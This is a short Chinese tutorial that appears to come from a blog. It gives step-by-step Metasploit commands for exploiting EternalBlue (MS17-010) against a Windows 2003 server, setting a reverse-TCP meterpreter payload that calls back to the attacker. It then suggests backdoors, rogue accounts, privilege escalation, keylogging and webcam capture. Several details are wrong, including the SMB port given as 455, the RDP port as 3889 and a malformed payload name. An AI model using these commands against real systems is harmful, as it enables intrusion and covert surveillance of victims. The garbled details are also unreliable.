永恒之蓝这个漏洞每个服务器版本都有出现，只要开启455端口就很危险，因为这个漏洞危害性极大，一旦被攻陷后果不堪设想，建议关闭这个端口。[出自:jiwo.org]

永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞，该漏洞导致攻击者在目标系统上可以执行任意代码，

第一：先扫一波服务器有没有开启455这个端口

第二：命令msfconsole进入metasploit工作台

由于我的服务器是windows 2003版的，所以我选择ms17_010_psexec这个选项，对应服务器版本就行了，每个漏洞都有对应攻击。

msf6 > use exploit/windows/smb/ms17_010_psexec

第三：设定攻击目标IP

set RHOSTS 目标ip

上图看到这样已经成功把目标ip设置上去了

接下来我们选一个攻击载荷

set payload windows/x64s/meterpreter/reverse_tcp

现在攻击载荷也成功设置了

第四：配置攻击机的IP和监听端口

set LHOST 攻击机ip

set LPORT 监听端口

看到这样就行了，现在是万事俱备，只等待攻击命令了。

第五：输入exploit发动总攻击命令

现在已经攻击成功了，输入shell进入攻击机命令面板

非常完美，现在可以控制对方机器了，我们敲命令就相当在对方本机敲的命令，可以给对方服务器留个后门，添加账户提权后用可用命令来开3889端口，然后就可以远程连接对方机器了，这次只是介绍攻击方法，攻击成功后，可以用命令来开启键盘记录，开摄像头捕抓屏幕等等，还有很多功能就不多说了。